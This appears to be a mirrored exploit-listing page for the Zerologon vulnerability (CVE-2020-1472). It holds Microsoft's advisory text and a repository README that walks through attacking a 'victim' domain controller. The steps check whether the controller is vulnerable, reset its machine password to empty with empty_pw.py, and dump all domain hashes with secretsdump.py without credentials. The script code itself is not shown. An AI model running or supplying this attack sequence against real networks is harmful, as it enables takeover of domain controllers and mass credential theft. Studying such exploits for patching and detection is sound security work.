CVE-2020-1472 PoC — Netlogon Elevation of Privilege Vulnerability

Source

Associated Vulnerability

Title:Netlogon Elevation of Privilege Vulnerability (CVE-2020-1472)
Description:An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network. To exploit the vulnerability, an unauthenticated attacker would be required to use MS-NRPC to connect to a domain controller to obtain domain administrator access. Microsoft is addressing the vulnerability in a phased two-part rollout. These updates address the vulnerability by modifying how Netlogon handles the usage of Netlogon secure channels. For guidelines on how to manage the changes required for this vulnerability and more information on the phased rollout, see How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 (updated September 28, 2020). When the second phase of Windows updates become available in Q1 2021, customers will be notified via a revision to this security vulnerability. If you wish to be notified when these updates are released, we recommend that you register for the security notifications mailer to be alerted of content changes to this advisory. See Microsoft Technical Security Notifications.

Description

Set of scripts, to test and exploit the zerologon vulnerability (CVE-2020-1472).

Readme

# Zerologon
Set of scripts, to test and exploit the zerologon vulnerability (CVE-2020-1472)

<br>
<img src="https://imgur.com/N5X7OA6.png" alt="banner"/>

***

# What is it?

ZeroLogon is a vulnerability that allows us to exploit a cryptography flaw in Microsoft's Active Directory Netlogon Remote Protocol (MS-NRPC), which allows users to log in to servers using NTLM. 

***

# Previous steps 

Before executing the exploit we must know that we need a different version of impacket, for this we will do the following. 

``apt remove --purge impacket-scripts python3-impacket``

``git clone https://github.com/SecureAuthCorp/impacket.git``

``cd impacket``

``pip install .``

***

# PoC (Proof Of Concept)

``git clone https://github.com/Nekoox/zerologon.git``

``cd zerologon``

``pip install -r requirements.txt``

## Check if the victim domain controller is vulnerable to zerologon.

``python3 tester.py <DC-NAME> <ip-address>``

In the event that the victim DC is vulnerable, a message will appear saying "Success! DC can be fully compromised by a Zerologon attack." 

Otherwise, that is, the victim DC is not vulnerable because the security hole has been patched, we will get the following message "Attack failed. Target is probably patched." 

***

## Change the password of the vulnerable domain controller to an empty string. 

``python3 empty_pw.py <DC-NAME> <ip-address>``

If the Domain Controller is vulnerable, after running the exploit it should not have any password. 


## Dump hashes of the Domain Controller. 

``> secretsdump.py -just-dc <DC-NAME>\$@<ip-address>``

By executing this, we will be able to see all the hashes of the domain, without any credentials.

File Snapshot


 [4.0K]  /data/pocs/92fe6e509506e1eadfb729f863b648841c1464e0
├── [5.7K]  empty_pw.py
├── [1.0K]  LICENSE
├── [1.6K]  README.md
├── [ 563]  requirements.txt
├── [6.4K]  reset_original_pw.py
└── [3.0K]  tester.py

0 directories, 6 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!